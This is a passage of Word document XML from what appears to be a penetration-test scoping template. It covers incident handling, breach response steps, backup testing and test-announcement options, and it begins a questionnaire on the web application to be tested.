      <w:r w:rsidRPr="003D4623">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Questions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="528301BD" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="003D4623" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="system-penetration-and-failure"/>
      <w:r w:rsidRPr="003D4623">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>System Penetration and Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6909F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5646D8E3" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="001937A8" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3613"/>
        <w:gridCol w:w="5747"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="698CFC53" w14:textId="77777777" w:rsidTr="00EA00E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76FB4DFC" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action if System is Penetrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="599F3B54" w14:textId="2C782D21" w:rsidR="00EE050D" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Immediate Response</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Notify client  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9D2268" w14:textId="533BD8B3" w:rsidR="00EE050D" w:rsidRDefault="0044553A" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Containment</w:t>
            </w:r>
            <w:r w:rsidR="00112BBC">
              <w:t xml:space="preserve">: Isolate affected systems  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="610B1530" w14:textId="77777777" w:rsidR="00EE050D" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mitigation</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Implement temporary fixes  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500CFD4D" w14:textId="77777777" w:rsidR="00EE050D" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Analysis</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Investigate breach details  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BF8A1B2" w14:textId="77777777" w:rsidR="00EE050D" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reporting</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Document findings and actions taken  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D503B88" w14:textId="77777777" w:rsidR="00EE050D" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Recovery</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Restore normal operations  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21EBAE5D" w14:textId="5209CED2" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Post-Incident Review</w:t>
            </w:r>
            <w:r>
              <w:t>: Evaluate response and improve procedures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="2D6570CE" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B8F47C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Backup Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57EEAB24" w14:textId="78829F3B" w:rsidR="00EE050D" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Regular Backup Testing</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Yes/No  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B3736B3" w14:textId="77777777" w:rsidR="00EE050D" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Frequency</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: [Insert Testing Frequency: Daily, Weekly, Monthly, etc.]  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32882E50" w14:textId="23C08190" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
            <w:r>
              <w:t>: [Insert details on backup testing process]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="30D8F813" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27A55C17" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Additional Details </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCA9C40" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="19D700E3" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EB1CCEB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Date of Introduction/Kickoff Meeting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="560F08F2" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6849B730" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="003D4623" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="incident-handling-and-testing-protocols"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidRPr="003D4623">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Incident Handling and Testing Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F05AB83" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="0074775A" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3796"/>
        <w:gridCol w:w="5564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="39DFE7A2" w14:textId="77777777" w:rsidTr="00EA00E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4791C331" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Incident Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3DF9F95B" w14:textId="7776E254" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Steps for Serious Security Incident</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">:  1. Notify client </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>immediately  2</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">. Contain the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>issue  3</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">. Assess the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>impact  4</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">. Implement temporary </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>fixes  5</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">. Document the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>incident  6</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">. Report findings to the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>client  7</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>. Perform a post-incident review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="5143B950" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DC607F1" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Announcement to Company Monitoring/Incident Response Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="112B9D71" w14:textId="3F630EA8" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Announcement Status</w:t>
            </w:r>
            <w:r>
              <w:t>: [Choose an item: Announced/Not Announced]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="5D9FB28B" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E2913EC" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Avoidance of IP Addresses by Target Department/Organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78EE00C0" w14:textId="081716E4" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Detection/Avoidance Actions</w:t>
            </w:r>
            <w:r>
              <w:t>: [Choose an item: Yes/No]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3ED994DA" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="529174CF" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Detection and Blocking Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="313AFBC5" w14:textId="75FD00D4" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impact on Test</w:t>
            </w:r>
            <w:r>
              <w:t>: [Choose an item: Ends Test/Does Not End Test]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="63093511" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C303255" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Steps if Systems Get Blocked and Required Approvals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2007B721" w14:textId="7539B6BA" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Continuation Steps</w:t>
            </w:r>
            <w:r>
              <w:t>: [Click or tap here to enter text: Describe steps to continue if systems are blocked and any required approvals]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="47C6FDAF" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7345C356" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Immediate Issue Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5663A53D" w14:textId="6BED0E98" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
            <w:r>
              <w:t>: Determine if issues should be mitigated immediately or only reported. [Choose an item: Mitigate Immediately/Report Only]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="2B354E58" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37FF0B53" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Announcement to Target Personnel or Asset Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E624671" w14:textId="52AF5139" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Announcement Status</w:t>
            </w:r>
            <w:r>
              <w:t>: [Choose an item: Announced/Not Announced]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="370B5206" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="web-1"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidRPr="003D4623">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8355"/>
        <w:gridCol w:w="1005"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="19032D56" w14:textId="77777777" w:rsidTr="00EA00E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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="485671AB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37537D85" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0D68770B" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29EF03CD" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Information required for the Web App/API/Server/Backend penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="517194DB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="19B90D5A" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BABA088" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>What is the application name?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="023A82D0" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="0E8A2177" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B41FA7B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>What is the application URL/IP?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D3327C9" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="7FADC868" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="643284BB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>What language is the application written in (ASP, PHP, Java etc.)?</w:t>
            </w:r>
          </w:p>
